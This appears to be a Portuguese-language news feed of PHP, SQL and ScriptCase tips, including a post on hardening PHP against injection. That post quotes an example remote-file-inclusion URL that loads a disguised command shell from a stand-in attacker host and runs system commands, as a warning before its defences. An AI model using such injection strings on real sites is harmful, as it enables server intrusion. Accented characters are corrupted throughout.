SCRIPTCASE AJAX - Associa��o : Not�cias

Pegar �ltimo dia do M�s

Mon, 23 Aug 2010 10:47:56 -0300

$mes_aux=4;

$data_aux=date("Y-").($mes_aux+1)."-01";
$data_aux=sc_date($data_aux,"aaaa-mm-dd","-",1,0,0);
$dia_aux=substr($data_aux ,-2);

//pode criar uma function passando o m�s e ano (default do ano=CORRENTE)

Conex�o Permanente com o Banco de Dados

Sat, 09 Jan 2010 08:24:08 -0200

Conex�o Permanente com o Banco de Dados

Conex�es persistentes s�o conex�es que n�o fecham quando a execu��o do seu script termina. Quando uma conex�o persistente � requisitada, o PHP checa se j� existe uma conex�o persistente id�ntica (que foi mantida aberta anteriormente) - e, se ela existe, ele a usa. Se n�o existir, ele cria uma nova. Uma conex�o 'id�ntica' � uma conex�o que foi aberta ao mesmo host, com o mesmo nome de usu�rio e a mesma senha (onde for aplic�vel).

Pessoas que n�o est�o totalmente familiarizadas com a maneira como servidores web trabalham e distribuem a carga podem confundir conex�es persistentes com o que elas n�o s�o. In particular, elas n�o d�o a voc� a habilidade de abrir 'sess�es de usu�rios' na mesma conex�o, elas n�o d�o a habilidade de construir uma transa��o eficientemente, e elas n�o fazem um monte de outras coisas. De fato, para ser extremamente claro sobre o assunto, conex�es persistentes n�o te d�o nenhuma funcionalidade que n�o era poss�vel com as suas correspondentes n�o-persistentes.

Por que?

Tem a ver com a maneira como os servidores web funcionam. Existem tr�s maneiras de seu servidor web utilizar o PHP para gerar p�ginas.

O primeiro m�todo � usar o PHP como um CGI "wrapper". Quando executado dessa maneira, uma inst�ncia do interpretador do PHP � criada e destru�da para cada requisi��o de p�gina (por uma p�gina PHP) para o seu servidor web. Como ela � destru�da ap�s cada requisi��o, quaisquer recursos que ela adquirir (como uma conex�o para um banco de dados) s�o fechados quando ela � destru�da. Nesse caso, n�o h� nenhum ganho ao tentar usar conex�es persistentes -- elas simplesmente n�o persistem.

O segundo m�todo, o mais popular, � rodar o PHP como um m�dulo em um servidor com multi-processos, que atualmente s� inclue o Apache. Um servidor com multi-processos tipicamente tem um processo (pai) que coordena uma s�rie de processos (filhos) que s�o os que realmente fazem o trabalho de servir as p�ginas. Quando uma requisi��o chega de um cliente, ela � entregue � um dos filhos que n�o estiver ocupado servindo outro cliente. Isso significa que quando o mesmo cliente faz uma segunda requisi��o ao servidor, ele pode ser servido por um processo filho diferente do da primeira vez. Quando abre-se uma conex�o persistente, cada p�gina que requisitar servi�os de SQL pode reusar a mesma conex�o estabelecida ao servidor SQL.

O �ltimo m�todo � usar o PHP como um plug-in para um servidor web multithreaded. Atualmente, o PHP4 tem suporte para ISAPI, WSAPI, e NSAPI (no Windows), todos permitindo PHP ser usado como um plug-in em servidores multithreaded como Netscape FastTrack (iPlanet), Internet Information Server (IIS) da Microsoft, e O'Reilly's WebSite Pro. O comportamento � essencialmente o mesmo do modelo multiprocessado descrito anteriormente.

Se conex�es persistentes n�o tem nenhuma funcionalidade a mais, para que elas servem?

A resposta � extremamente simples -- efici�ncia. Conex�es persistentes s�o boas se o sobrecarga (overhead) de criar uma conex�o ao seu servidor SQL for alta. Saber se essa sobrecarga � alta depende de v�rios fatores. Como que tipo de banco de dados �, se est� ou n�o na mesma m�quina onde o servidor web est�, o qu�o carregada de trabalho est� a m�quina hospedando o servidor SQL e assim por diante. O ponto � que se a sobrecarga de conex�o for alta, conex�es persistentes ajudam consideravelmente. Elas fazem com que os processos filhos simplesmente conectam-se uma vez s� durante toda sua dura��o, ao inv�s de cada vez que eles processam uma p�gina que requer uma conex�o ao servidor SQL. Isso significa que cada filho que abriu uma conex�o persistente ter� sua pr�pria conex�o aberta ao servidor. Por exemplo, se voc� tiver 20 processos filhos diferentes que rodassem um script que fizesse uma conex�o persistente � um servidor SQL, voc� teria 20 conex�es diferentes ao banco, uma de cada filho.

Perceba, no entanto, que isso pode ter algumas desvantagens se voc� estiver usando um banco com limite de conex�es que � excedido pela conex�es persistentes filhas. Se seu banco tem um limite de 16 conex�es simult�neas, e durante um momento de pico de acessos, 17 processos filhos tentam fazer a conex�o, um deles n�o ser� capaz. Se houver bugs no seus scripts que n�o permitem que as conex�es se fechem (como loops infinitos) o banco de dados com apenas 16 conex�es pode rapidamente ficar sobrecarregado. Procure na documenta��o do seu banco por informa��es sobre como lidar com conex�es ociosas ou abandonadas.

Aviso
Existem mais alguns cuidados a se tomar quando usando conex�es persistentes. Um deles � que, quando usando travamento de tabela em uma conex�o persistente, se o script por qualquer raz�o n�o pode destravar a mesma, ent�o scripts subsequentes usando a mesma conex�o ser�o bloqueados indefinidamente e pode ser preciso reiniciar o servidor http ou o banco de dados. Outro cuidado a se ter �, quando usando transa��es, um bloco de transa��o tamb�m ser� carregado para o pr�ximo script que usar a conex�o se a execu��o do script terminar primeiro que o bloco de transa��o. Em ambos os casos, voc� pode usar register_shutdown_function() para registrar uma fun��o simples de limpeza para destravar suas tabelas e fazer roll back de suas transa��o. O ideal � evitar o problema completamente n�o usando conex�es persistentes em scripts que usam travamento de tabelas ou transa��es (voc� ainda pode usar elas nos outros casos).

Um resumo importante. Conex�es persistente foram feitas para ter um mapeamento de um-para-um com conex�es normais. Isso significa que voc� deve sempre ser capaz de substituir conex�es persistentes com conex�es n�o-persistentes e isso n�o mudar� a maneira como seu script se comporta. Pode (e provavelmente ir�) mudar a efici�ncia do mesmo, mas n�o o seu comportamento!

PHP CONFERENCE

Mon, 24 Nov 2008 16:29:55 -0200

Segue link disponibilizado pela Line Brasil, para PHP CONFERENCE, com 50%.

http://www.linebrasil.com.br/phpconference/phpconf50.html

PHP - Fun��o para remover acentos

Wed, 15 Oct 2008 12:43:29 -0300

Talvez seja algo bem bobo, mas ajuda bastante, principalmente quando da impress�o matricial
direto pela porta que usa a fonte da impressora. Como curiosidade, observem como a
fun��o str_replace � poderosa.

�function removeacentos ($var)
{
�� $ACENTOS�� = array("�","�","�","�","�","�","�","�");
�� $SEMACENTOS= array("A","A","A","A","a","a","a","a");
�� $var=str_replace($ACENTOS,$SEMACENTOS, $var);
��
�� $ACENTOS�� = array("�","�","�","�","�","�","�","�");
�� $SEMACENTOS= array("E","E","E","E","e","e","e","e");
�� $var=str_replace($ACENTOS,$SEMACENTOS, $var);
�� $ACENTOS�� = array("�","�","�","�","�","�","�","�");
�� $SEMACENTOS= array("I","I","I","I","i","i","i","i");
�� $var=str_replace($ACENTOS,$SEMACENTOS, $var);
��
�� $ACENTOS�� = array("�","�","�","�","�","�","�","�","�","�");
�� $SEMACENTOS= array("O","O","O","O","O","o","o","o","o","o");
�� $var=str_replace($ACENTOS,$SEMACENTOS, $var);
��
�� $ACENTOS�� = array("�","�","�","�","�","�","�","�");
�� $SEMACENTOS= array("U","U","U","U","u","u","u","u");
�� $var=str_replace($ACENTOS,$SEMACENTOS, $var);
�� $ACENTOS�� = array("�","�","�","�","�");
�� $SEMACENTOS= array("C","c","a.","o.","o.");
�� $var=str_replace($ACENTOS,$SEMACENTOS, $var);��

�� return $var;
}

?>

Dica de como mandar e-mails via PHP sem dor de cabe�a

Thu, 02 Oct 2008 14:02:27 -0300

Eu sempre usei a classe PHPMailer... Acho ela fant�stica.

Para baixar a classe, acesse: http://phpmailer.codeworxtech.com

Segue abaixo um exemplo de como enviar e-mails com ela:

require("class.phpmailer.php");��
��
$mail�=�new�PHPMailer();��
��
$mail->From��=�"seu@email.com";��
$mail->FromName�=�"Seu Nome";��
$mail->Host��=�"smtp.seudominio.com.br";��
$mail->Mailer��=�"smtp";�
//$mail->SMTPSecure�� = "ssl"; // Se tiver SSL no SMTP
��
�� // Corpo
��$body��=�"Teste de e-mail com PHP Mailer.";��
��$body�.=�"Apenas um teste.";�
��$mail->Body��=�$body;��
��$mail->AddAddress("destino@email.com");��
��$mail->AddStringAttachment("arquivo.zip");� //se quiser anexar algo
��
��if(!$mail->Send())� {
��echo�"Nao consegui enviar";
�}
}

Abra�os

Guilherme

Dica para filtrar Arrays Multi-dimensionais

Thu, 02 Oct 2008 13:47:05 -0300

Pessoal,

Independente do seu n�vel como programador, vou publicar um pequeno c�digo que foi muito �til pra mim ontem. Este foi desenvolvido por um grande amigo, Felipe Pena.

O objetivo � pegar todos os valores de um array multi-dimensional sem repet�-los.

No PHP temos a fun��o array_unique(), por�m esta s� funciona em single arrays..

Exemplo Single array: $minha_array[0] = 10;
Exemplo Multi-dimentional array: $minha_array[0][0] = 10;

Ou seja, todo o dataset do sc_lookup � um array multi-dimensional.

Exemplo pr�tico de como usar a fun��o que estou falando:

sc_lookup(dataset,"select id_cotacao, id_forn1, id_forn2, id_forn3 from cotacoes where id_cotacao = {id_cotacao}");
$a = {dataset};
$tmp = array();
for ($i = 0; $i < count($a); $i++) {
$a[$i] = array_unique($a[$i]);
if ($i > 0) {
$tmp2 = array();
foreach ($a[$i] as $k => $v) {
if (!in_array($v, $tmp, true)) {
$tmp2[$k] = $v;
}
}
$a[$i] = $tmp2;
}
$tmp = array_merge($a[$i], $tmp);
}
unset($tmp, $tmp2);
print_r($a);


Tudo isso acima faz a mesma fun��o do array_unique (http://br2.php.net/manual/pt_BR/function.array-unique.php) s� que n�o apenas para Single Array, mas sim para qualquer tipo.

Espero que voc� possa usar em algum momento.

[]'s

SQL - TRIGGERS, Breve nota��o

Wed, 03 Sep 2008 15:18:52 -0300

Trigger: � chamada quando uma tabela � excitada por um dos comandos: INSERT, DELETE ou UPDATE.
�Trigger = gatilho, disparador;====================== create database locadora;use locadora;

create table filmes(
�cod_fil int not null auto_increment,
�titulo varchar(255),
�constraint pk_filmes
� primary key(cod_fil)
) engine=innodb;

create table clientes(
�cod_cli int not null auto_increment,
�nome varchar(255),
�constraint pk_clientes
� primary key(cod_cli)
) engine=innodb;
create table filmes_clientes(
� cod_fil int not null,
�cod_cli int not null,
�constraint fk_filmes
�� foreign key(cod_fil)
�� references filmes(cod_fil),
� constraint fk_clientes
�� foreign key(cod_cli)
�� references clientes(cod_cli)
) engine=innodb;create table tblog(
�cod int not null auto_increment,
�filme int not null,
�cliente int not null,
�retirada date not null,
�devolucao date,
�primary key(cod)
) engine=myisam;delimiter |
CREATE TRIGGER tralugar
� before insert ON filmes_clientes
� FOR EACH ROW BEGIN
�� insert into tblog(filme,cliente,retirada)
� values(new.cod_fil,new.cod_cli,now());� END;
� |
� delimiter ;
�delimiter |
�CREATE TRIGGER trdevolver
�� after delete ON filmes_clientes
�� FOR EACH ROW BEGIN
�� update tblog set devolucao=now()
�� where filme=old.cod_fil
�� and� cliente=old.cod_cli;
�� END;
� |
�delimiter ;/// DADOS DE TESTES: insert into filmes values(1,"matrix"),(2,"MIB");
insert into clientes values(1,"joao"),(2,"Pedro");
�

Configurando o PHP contra o PHP injection

Mon, 28 Apr 2008 11:13:57 -0300

Bom, inicialmente vou falar um pouco sobre o que �...
o PHP injection � a utiliza��o indevida de fun��es do PHP normalmente abertas para uso. As fun��es exec() e system() que por default s�o abertas permitindo a execu��o de qualquer coisa pelo seu servidor. Por exemplo:

http://www.site.com/arquivo.php?id=8465

Vamos supor que voc� use seu site igual ao acima, com o exec() e system() abertos o hacker se utiliza para executar coisas externas:

http://www.site.com/arquivo.php?id=http://www.sitehacker.com/cmd.gif?&cmd=ls; cmd; uname -a

O site hacker tem hospedado um arquivo chamado cmd.gif que na verdade � um arquivo .php com fun��es para executar comandos no seu servidor, no exemplo acima o hacker est� dando comandos ls, cmd e uname -a em seu servidor atrav�s do seu site com as fun��es exec() e system() abertas.

Bom deixemos o bl� bl� bl� de lado e agora partir para o que interessa de verdade, se defender contra essa vulnerabilidade:

Primeiro, edite o php.ini especifique as op��es:

C�digo:

allow_url_fopen = Off

Isso vai impedir que um include ou um open que n�o esteja hardcoded, ou seja, que tenham seus valores fornecidos por uma vari�vel, fa�am includes remotos, como no exemplo citado no in�cio deste post.

C�digo:

safe_mode = On

Isto impedir� que os scripts em PHP abram arquivos que n�o sejam do mesmo dono (UID) do script. Mas n�o esque�a de dar um chown nos scripts para um usu�rio sem privil�gios (o nobody t� de bom tamanho), criando um usu�rio phpscripts ou algo assim.

C�digo:

register_globals = Off

O "register globals" ligado diz para o PHP que qualquer vari�vel passada como par�metro deve ser reconhecida como uma vari�vel v�lida dentro do c�digo PHP. Isto facilita muito as coisas pois com isso n�o precisamos ficar associando o array $_REQUEST a vari�veis internas, mas ao mesmo tempo � perigoso, pois permite a um atacante controlar vari�veis internas que voc� n�o tenha corretamente incializado.

C�digo:

magic_quotes_gpc = On

Se voc� n�o tem conhecimento sobre como "sanitizar" vari�veis antes de envi�-las para bancos de dados ou programas externos, uma boa op��o � deixar o "magic quotes" ligado, pois ele dificulta bastante a manipula��o de strings para, por exemplo, provocar um SQL Injection no seu acesso ao banco.

C�digo:

display_errors = Off

Ao inv�s de visualizar os erros de programa��o no browser, use o log do servidor. Esta op��o impede que atacantes provoquem erros na sua aplica��o para descobrirem paths da estrutura de arquivos.

Leia as demais op��es do seu php.ini, especialmente se voc� estiver usando o PHP sob IIS/Windows. Existem coisas importantes l�, mas que nunca tive a oportunidade de usar.

Al�m das configura��es, algumas pr�ticas de programa��o podem salvar a sua pele. Por exemplo, NUNCA PASSE O NOME DE UM ARQUIVO COMO PAR�METRO PARA INCLUDE OU FOPEN! � muito comum voc� encontrar sites com URLs do tipo:

Citar:

http://www.site.com/index.php?inc=contato

E ent�o, quando mudamos a palavra contato para qualquer outra coisa (por exemplo "testnotfound") o PHP exibe a fat�dica mensagem de erro de "Arquivo n�o encontrado". E aten��o: N�O CONFIE NO SEU C�DIGO SE VOC� EST� ACRESCENTANDO UM PATH COMPLETO E A EXTENS�O DO ARQUIVO NA HORA DE INCLUIR, por exemplo:

C�digo PHP:

include("/home/asnocoder/www/includes/".$inc.".php");�

N�o confie nisso! Continua perfeitamente poss�vel incluir qualquer arquivo do seu sistema atrav�s da manipula��o correta da vari�vel $inc.

E j� que estamos falando de includes, NUNCA COLOQUE EXTENS�O .inc NOS SEUS SCRIPTS OU BIBLIOTECAS. Estas extens�es n�o s�o tratadas pelo webserver e o c�digo fonte do programa � exibido caso eles sejam chamados diretamente no browser. Voc� tem tr�s op��es:

1. Renomear estes arquivos para "arquivo.inc.php", por exemplo (e alterar os includes que fazem refer�ncia a eles).
2. Mover estes arquivos para uma parte da �rvore de diret�rios que n�o seja acess�vel diretamente pelo browser.
3. Proteger o diret�rio onde estes arquivos est�o. Segue exemplo de diretrizes do Apache:

C�digo:

    Options None    Order Allow, Deny    Deny from All    AllowOverride None    Satisfy All

Quando eu tenho que fazer um include/fopen de acordo com uma op��o do usu�rio, eu costumo criar um ninho de IFs e passar como par�metro para a p�gina apenas um n�mero, ou um c�digo qualquer, fazendo algo do tipo:

C�digo PHP:

$inc�=�"index.php";�//�P�gina�default
if($_GET['opcao']=="1")�{�$inc�=�"pagina1.php";�}
if($_GET['opcao']=="2")�{�$inc�=�"pagina2.php";�}
include($inc);�

Bom d�vidas � mais acessar:
http://www.php.net/manual/en/security.php

Abra�os � todos e espero ter ajudado um pouco.
Submetido por Victor A Moraes [/html]

PDOv2 - Discuss�es a respeito do uso de CLA

Wed, 30 Jan 2008 10:38:00 -0200

Atualmente alguns dos core-developers do PHP discutem a respeito da cria��o do PDOv2, que seria o PDO atual melhorado.Todos n�s que utilizamos PDO sabemos que existem ainda alguns pontos em que ele possui alguns bugs e n�o funciona como deveria. Um exemplo � o driver para MS SQL Server que simplesmente funciona muito mal. Eu conhe�o pessoas que desistiram de usar PDO para SQL Server devido a alguns problemas principalmente no que diz respeito a transa��es.Estava lendo no blog do Wez Furlong, um dos criadores do PDO, que ele, o Andi Gutmans e o Ilia Alshanetsky est�o em contato com a MySQL, PostgreSQL, IBM, Oracle e a Microsoft para desenvolverem o PDOv2 em conjunto e pelo que ele disse, estas entidades est�o todas interessadas em contribuir no desenvolvimento da API, s� que para isso acontecer, � necess�rio que quem desenvolver algo para o PDOv2 precisar� assinar um CLA (Contributor Licence Agreement) que � um documento em que o desenvolvedor
diz basicamente que abre m�o de qualquer patente ou direito que ele tenha sobre aquele determinado c�digo que ele contribuiu, por�m ele n�o perde o direito de usar o c�digo como lhe aprouver em outras circunst�ncias. Este tipo de documento d� uma seguran�a para empresas e entidades envolvidas no que tange a processos por quebra de patentes por exemplo.Eu mesmo assinei um CLA para poder desenvolver no Zend Framework e nesta CLa que assinei eu apenas digo que o c�digo que eu colaborei pode ser usado sem �nus algum e que eu n�o tenho v�nculo com a Zend.Esta CLA se implica somente ao PDO e n�o ao PHP como um todo, por�m tem algumas pessoas que n�o est�o gostando desta id�ia, dizendo que foi uma decis�o unilateral por parte dos envolvidos no desenvolvimento do PDOv2, que CLA n�o � uma boa id�ia e etc. Eu pessoalmente, acho que com a assinatura de CLA, o PDOv2 ser� mais est�vel e ter� menos bugs, enfim, ser� algo realmente confi�vel em ambientes cr�ticos.Eu n�o vejo problema algum, o que n�o pode � o PDO continuar como est�, com mais ou menos dois desenvolvedores ativos, com v�rios bugs e com suporte incompleto para algumas plataformas de banco de dados o que nos obriga ou a usar as fun��es de banco mais antigas (e perder a abstra��o de acesso a banco de dados), usar o PDO com os bugs
que ele tem ou utilizar as classes de abstra��o escritas em PHP, que apesar de algumas serem �timas(creole por exemplo), perdem em performance para o PDO.Portanto, deixo a minha sugest�o: Quem for contra o uso de CLA para o desenvolvimento do PDOv2, que mostre alguma outra solu��o plaus�vel.